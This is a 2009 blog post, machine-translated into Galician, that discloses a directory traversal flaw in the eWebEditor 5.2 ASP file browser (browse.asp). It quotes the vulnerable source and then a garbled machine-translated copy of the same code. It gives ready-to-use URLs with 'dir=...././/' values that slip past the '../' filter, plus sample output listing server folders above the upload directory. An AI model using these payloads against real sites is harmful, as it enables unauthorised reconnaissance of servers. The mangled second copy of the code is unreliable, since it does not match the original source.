ewebeditor directorio 5,2 columna de vulnerabilidade asp, ewebeditor directorio columna, vulnerabilidades, St0p-blog 's

ewebeditor 5.2 vulnerabilidades catálogo da serie

Esta entrada foi publicada o 25 de xuño de 2009

: St0p
Propia estación co editor antes da súa propia axilizar o ewebeditor da versión 5.2 asp para traballar canso, para descansar, un editor non creo que realmente podo atopar unha brecha pequena, aínda que o papel da non, porén, ser usada para axudar ou moi bo.
Presentar unha lagoa existente no ewebeditor / asp / browse.asp

 Dim s_List, s_Url s_List = "" Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName 'Response.Write sCurrDir 'On Error Resume Next Set oFSO = Server . CreateObject ( "Scripting.FileSystemObject" ) Set oUploadFolder = oFSO. GetFolder ( Server . MapPath ( sCurrDir ) ) '注意一下sCurrDir变量,这个值等下我们可以用到 If Err. Number > 0 Then s_List = "" Exit Function End If If sDir <> "" Then If InstrRev ( sDir, "/" ) > 1 Then s_Url = Left ( sDir, InstrRev ( sDir, "/" ) - 1 ) Else s_Url = "" End If s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='" & s_Url & "'>" & _ "<td><img border=0 src='../sysimage/file/parentfolder.gif'></td>" & _ "<td>..</td>" & _ "<td>&nbsp;</td>" & _ "</tr>" End If 'Response.Write sDir&"!"&s_List Dim oSubFolder For Each oSubFolder In oUploadFolder. SubFolders 'Response.Write oUploadFolder.SubFolders If sDir = "" Then s_Url = oSubFolder. Name Else s_Url = sDir & "/" & oSubFolder. Name End If s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='" & s_Url & "'>" & _ "<td><img border=0 src='../sysimage/file/closedfolder.gif'></td>" & _ "<td noWrap>" & oSubFolder. Name & "</td>" & _ "<td>&nbsp;</td>" & _ "</tr>" Next 'Response.Write s_List Set oUploadFiles = oUploadFolder. Files For Each oUploadFile In oUploadFiles 'Response.Write oUploadFile.Name sFileName = oUploadFile. Name If CheckValidExt ( sFileName ) = True Then '这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了 If sDir = "" Then s_Url = sContentPath & sFileName Else s_Url = sContentPath & sDir & "/" & sFileName End If s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' url='" & s_Url & "'>" & _ "<td>" & FileName2Pic ( sFileName ) & "</td>" & _ "<td noWrap>" & sFileName & "</td>" & _ "<td align=right>" & GetSizeUnit ( oUploadFile. size ) & "</td>" & _ "</tr>" End If Next Set oUploadFolder = Nothing Set oUploadFiles = Nothing 'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url If sDir = "" Then s_Url = "" 's_Url = "/" Else s_Url = "/" & sDir & "" 's_Url = "/" & sDir & "/" End If s_List = s_List & "</table>" s_List = HTML2JS ( s_List ) 'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url s_List = "parent.setDirList(" "" & s_List & "" ", " "" & s_Url & "" ")" GetList = s_List End Function '如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷..现在只能列出允许后缀的文件和目录名 Function CheckValidExt ( s_FileName ) If sAllowExt = "" Then CheckValidExt = True Exit Function End If Dim i, aExt, sExt sExt = LCase ( Mid ( s_FileName, InStrRev ( s_FileName, "." ) + 1 ) ) CheckValidExt = False aExt = Split ( LCase ( sAllowExt ) , "|" ) For i = 0 To UBound ( aExt ) If aExt ( i ) = sExt Then CheckValidExt = True Exit Function End If Next End Function '我们顺着代码往下找,发现sCurrDir的值是通过下面的值得到的 Sub InitParam ( ) sType = UCase ( Trim ( Request . QueryString ( "type" ) ) ) sStyleName = Trim ( Request . QueryString ( "style" ) ) Dim i, aStyleConfig, bValidStyle bValidStyle = False For i = 1 To Ubound ( aStyle ) aStyleConfig = Split ( aStyle ( i ) , "|||" ) If Lcase ( sStyleName ) = Lcase ( aStyleConfig ( 0 ) ) Then bValidStyle = True Exit For End If Next If bValidStyle = False Then OutScript ( "alert('Invalid Style.')" ) End If sBaseUrl = aStyleConfig ( 19 ) 'nAllowBrowse = CLng(aStyleConfig(43)) nAllowBrowse = 1 If nAllowBrowse <> 1 Then OutScript ( "alert('Do not allow browse!')" ) End If sUploadDir = aStyleConfig ( 3 ) If Left ( sUploadDir, 1 ) <> "/" Then Select Case sType Case "REMOTE" sUploadDir = "../../" & sUploadDir & "Image/" Case "FILE" sUploadDir = "../../" & sUploadDir & "Other/" Case "MEDIA" sUploadDir = "../../" & sUploadDir & "Media/" Case "FLASH" sUploadDir = "../../" & sUploadDir & "Flash/" Case Else sUploadDir = "../../" & sUploadDir & "Image/" End Select End If 'sUploadDir =sUploadDir &"/" Select Case sBaseUrl Case "0" 'sContentPath = aStyleConfig(23) Select Case sType Case "REMOTE" sContentPath = "../" & aStyleConfig ( 3 ) & "Image/" Case "FILE" sContentPath = "../" & aStyleConfig ( 3 ) & "Other/" Case "MEDIA" sContentPath = "../" & aStyleConfig ( 3 ) & "Media/" Case "FLASH" sContentPath = "../" & aStyleConfig ( 3 ) & "Flash/" Case Else sContentPath = "../" & aStyleConfig ( 3 ) & "Image/" End Select Case "1" sContentPath = RelativePath2RootPath ( sUploadDir ) Case "2" sContentPath = RootPath2DomainPath ( RelativePath2RootPath ( sUploadDir ) ) End Select Select Case sType Case "REMOTE" sAllowExt = aStyleConfig ( 10 ) Case "FILE" sAllowExt = aStyleConfig ( 6 ) Case "MEDIA" sAllowExt = aStyleConfig ( 9 ) Case "FLASH" sAllowExt = aStyleConfig ( 7 ) Case Else sAllowExt = aStyleConfig ( 8 ) End Select sCurrDir = sUploadDir '注意这里,这个是得到了配置的路径地址 sDir = Trim ( Request ( "dir" ) ) '得到dir变量 sDir = Replace ( sDir, "\" , "/" ) '对dir变量进行过滤 sDir = Replace ( sDir, "../" , "" ) sDir = Replace ( sDir, "./" , "" ) If sDir <> "" Then If CheckValidDir ( Server . Mappath ( sUploadDir & sDir ) ) = True Then sCurrDir = sUploadDir & sDir & "/" '重点就在这里了,看到没有,当sUploadDir & sDir存在的时候,sCurrDir就为sUploadDir & sDir的值了'虽然上面对sDir进行了过滤,不过我们完全可以跳过.具体利用st0p会在下面的利用中给出 Else sDir = "" End If End If End Sub GetList function () Din s_List, s_Url s_List = "" Din oFSO, oUploadFolder, oUploadFiles, oUploadFile, 'Response.Write sCurrDir' sFileName On Error Resume Set Seguinte oFSO Server =. CreateObject oUploadFolder Set ("Scripting.FileSystemObject") = oFSO. GetFolder (Server. MapPath (sCurrDir)) 'variable sCurrDir nota, este valor pode utilizar o Se o err Número> 0 THEN s_List = "" End Función Exit Se sDir <> "" THEN Se InstrRev (sDir "/")> 1 THEN s_Url = left (sDir, InstrRev (sDir, "/") - 1) Else s_Url = "" End If s_List = s_List & "<tr onclick =" doRowClick (this) "onmouseover =" doRowOver (this) "onmouseout =" doRowOut (this) "isdir = '" path = "true" e s_Url & "'>" & _ "<td> <img Modelo = 0 src =" .. / sysimage / arquivo parentfolder / gif "> </ td>" & _ "<td> .. </ td>" & _ "<td> </ td>" & _ "</ tr>" End If 'o sDir Response.Write & "" & oSubFolder s_List Din por cada oSubFolder En oUploadFolder. oUploadFolder.SubFolders subdirectorios dos Response.Write Se sDir = "" THEN s_Url = oSubFolder. Nome Else s_Url = sDir & "/" End Nome e oSubFolder. Se s_List = s_List & " <tr onmouseout='doRowOut(this)' onmouseover='doRowOver(this)' onclick='doRowClick(this)' isdir='true' path='" & s_Url & "'> "& _" <td> <img Ficheiro: Flag of = 0 src "Name e oSubFolder. &" = '.. / sysimage / arquivo / closedfolder.gif'> </ td> "& _" <td noWrap> </ td> "& _" <td> </ td> "& _" </ tr> "Next 'Response.Write Set s_List oUploadFiles = oUploadFolder. arquivos para cada oUploadFile En oUploadFiles' oUploadFile.Name Response.Write sFileName = Nome oUploadFile. Se CheckValidExt (sFileName) = True THEN "Esta liña estaba un pouco deprimido, para detectar os sufixos de arquivo permitido, como non, non será capaz de incluír ou non incluír só o nome do directorio e arquivo de imaxe do Si sDir =" "THEN s_Url sContentPath & sFileName Else s_Url = sContentPath = a & sDir & "/" + End sFileName Se s_List = s_List & "<tr onmouseover='doRowOver(this)' onclick='doRowClick(this)' url='" onmouseout='doRowOut(this)' & s_Url & "'> "& _" <td> "& FileName2Pic (sFileName) &" </ td> "& _" <td noWrap> "& sFileName &" </ td> "& _" <td align=right> "& GetSizeUnit ( oUploadFile tamaño.) & "</ td>" & _ "</ tr>" End If Set oUploadFolder seguinte = oUploadFiles Set Nada = Nothing 'Response.Write Server.HTMLEncode (s_List) & "" & s_Url Se sDir = "" Entón s_Url = "" 's_Url = "/" Else s_Url = "/" + sDir & ""' s_Url = "/" + sDir & "/" End If s_List = s_List & "</ table>" s_List = HTML2JS ( s_List) 'Response.Write Server.HTMLEncode (s_List) & "" & s_Url s_List = "parent.setDirList (" "" & s_List & "" "" "" & s_Url & "" ")" End Función GetList = s_List "Se non paso de detección, debe ser capaz de incluír todos os ficheiros no directorio, e un pouco deprimida .. agora só lista os ficheiros e directorios para permitir sufixo do nome de Función CheckValidExt (s_FileName) Se o sAllowExt =" "THEN CheckValidExt = End Función Exit certo Se eu Din, aExt, sext sext = LCase (Mid (s_FileName, InStrRev (s_FileName,) + 1) ".") = False CheckValidExt aExt = Split (LCase (sAllowExt), "|") se i = 0 Para UBound (aExt) Se aExt (i) = sext Entón CheckValidExt = End Función Exit Certo If End Función Next 'para abaixo o código para atopar o valor atopado sCurrDir do seguinte paga a pena o initParam Sub () STYPE = UCase (Trim (request QueryString ("tipo"))) sStyleName = Trim (request QueryString ("estilo")) Din i, aStyleConfig, bValidStyle bValidStyle = False For i = 1 To Ubound (astyle) Split = aStyleConfig (astyle (i), "| | |") Se LCase (sStyleName) = LCase (aStyleConfig (0)) Entón bValidStyle Exit = True End If Next para bValidStyle = False THEN OutScript ("alert ('Estilo válido.')") End If sBaseUrl = aStyleConfig (19) 'nAllowBrowse = CLng (aStyleConfig (43)) = 1 nAllowBrowse Se nAllowBrowse <> 1 THEN OutScript ("alert (' Fin Non permita navegar ')") Se sUploadDir = aStyleConfig (3) Se Esquerda (sUploadDir, 1) <> "/" Entón Select Case stype Se sUploadDir "Remote" = ".. / .. /" & sUploadDir & "Image /" Case "FILE" sUploadDir = ".. / .. / "& sUploadDir &" Outro / "Case" MEDIA "sUploadDir =" .. / .. / "& sUploadDir &" media / "Case" Flash "sUploadDir =" .. / .. / "& sUploadDir e" Flash / " Case Else sUploadDir = ".. / .. /" & sUploadDir & "Image /" End Select End If 'sUploadDir = sUploadDir & "/" Case sBaseUrl Select Case "0" "sContentPath = aStyleConfig (23) No caso de stype Select Case" "sContentPath =" Remote .. / "& aStyleConfig (3) e" Image / "Case" FILE "sContentPath =" .. / "aStyleConfig e (3) e" Outro / "Case" MEDIA "sContentPath =" .. / "& aStyleConfig (3) e" media / "Case" Flash "sContentPath =" .. / "aStyleConfig e (3) e" Flash / "sContentPath Case Else =" .. / "aStyleConfig e (3) e" Image / "End Select Case" 1 "= sContentPath Se RelativePath2RootPath (sUploadDir)" 2 "= sContentPath RootPath2DomainPath (RelativePath2RootPath (sUploadDir)) End Select Select Case stype Case" "sAllowExt = aStyleConfig caso (10)" Remote file "sAllowExt = aStyleConfig (6 ) Case "MEDIA" sAllowExt = aStyleConfig (9) Case "Flash" sAllowExt = aStyleConfig caso (7) Else sAllowExt = aStyleConfig (8) End Select sCurrDir = Nota sUploadDir ', este é o camiño para a dirección de configuración sDir = Trim ( request ("dir")) 'obter a variable sDir dir = replace (sDir, "\", "/")' variable dir o sDir filter = replace (sDir ".. /", "") sDir = replace ( o sDir, ". /", "") Se sDir <> "" THEN Se CheckValidDir (Server. MapPath (sUploadDir & sDir)) = True THEN sCurrDir = sUploadDir & sDir & "/" 'centrar aquí, ver Non, cando cando sUploadDir & sDir, sCurrDir sobre o valor da sUploadDir & sDir "Aínda que na cara da sDir filtrada, pero podemos ignorar. St0p uso específico do sDir Else será dada na seguinte uso = "End If End If End Sub

Ei, vexa isto, ten que entender que, de feito, a filtración é dir, podemos construír un valor especial para ignorar a comprobación, así pode obter a estrutura de directorios e ver o arquivo coa extensión de ficheiros permitidos no ficheiro de configuración ..
O uso de métodos son os seguintes

http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=..../.// ..

A proba do St0p o directorio de subida é o directorio raíz do uploadfile o enderezo anterior, pode obter todos os directorios no directorio raíz.
Ei, se atopa unha fiestra aberta está en branco, non desánimo, que ver o código fonte, mira ti, que terá o seu directorio raíz do nome do directorio.
El directorio raíz existe un directorio dos clientes, podemos citar o seguinte enderezo seguinte estrutura

http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=...././/...././/guest

Entón, podemos tamén

http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=...././/../..../.// ..

Ir para as capas máis altas, a miña máquina de proba virtual, obter o directorio tres www, logfile datebase.

 <html> <head> <meta Http-equiv='Content-Type' content='text/html; charset=utf-8'> <title> eWebEditor </ TITLE> </ head> <body> linguaxe de script <= javascript> parent.setDirList ("<tr onmouseout='doRowOut(this)' onmouseover='doRowOver(this)' onclick='doRowClick(this)' isdir='true' path='../..'> <td > <img border=0 src='../sysimage/file/parentfolder.gif'> </ td> .. </ td> </ td> </ tr> <tr onclick = 'doRowClick (this) "onmouseover =" doRowOver (this) "onmouseout =" doRowOut (this) "isdir = camiño' verdadeiro '=' .. / .. / .. / ficheiros de rexistro"> <td> <fronteira img = 0 src = ".. / sysimage / arquivo / closedfolder.gif '> </ td> <td noWrap> logfiles </ td> </ td> </ tr> <tr onclick =" doRowClick (este ) 'onmouseover =' doRowOver (this) "onmouseout =" doRowOut (this) "isdir = 'camiño =' true .. / .. / .. / www"> <td> <img Modelo = 0 src = '. . / sysimage / arquivo / closedfolder.gif '> </ td> <td noWrap> www </ td> </ td> </ tr> </ table> "," / .. / .. / .. ") </ script> </ body> </ html>

Esta vulnerabilidade pode ser considerado só cando o uso auxiliar de detección de intrusión, pode obter a estrutura de directorios, por exemplo, o directorio cambio de xestión, o directorio da base de datos, para que poida obter o nome do directorio, mais non podo enumerar os arquivos deixe St0p deprimido. eu ....
Este é o segundo documento orixinal emitido pola St0p no blog, despois de múltiples, Ga, é agora considerada blog tamén abriu ..
Nota: O salto no directorio de sitios web empregado en todo o que podo atopar na recepción será substituído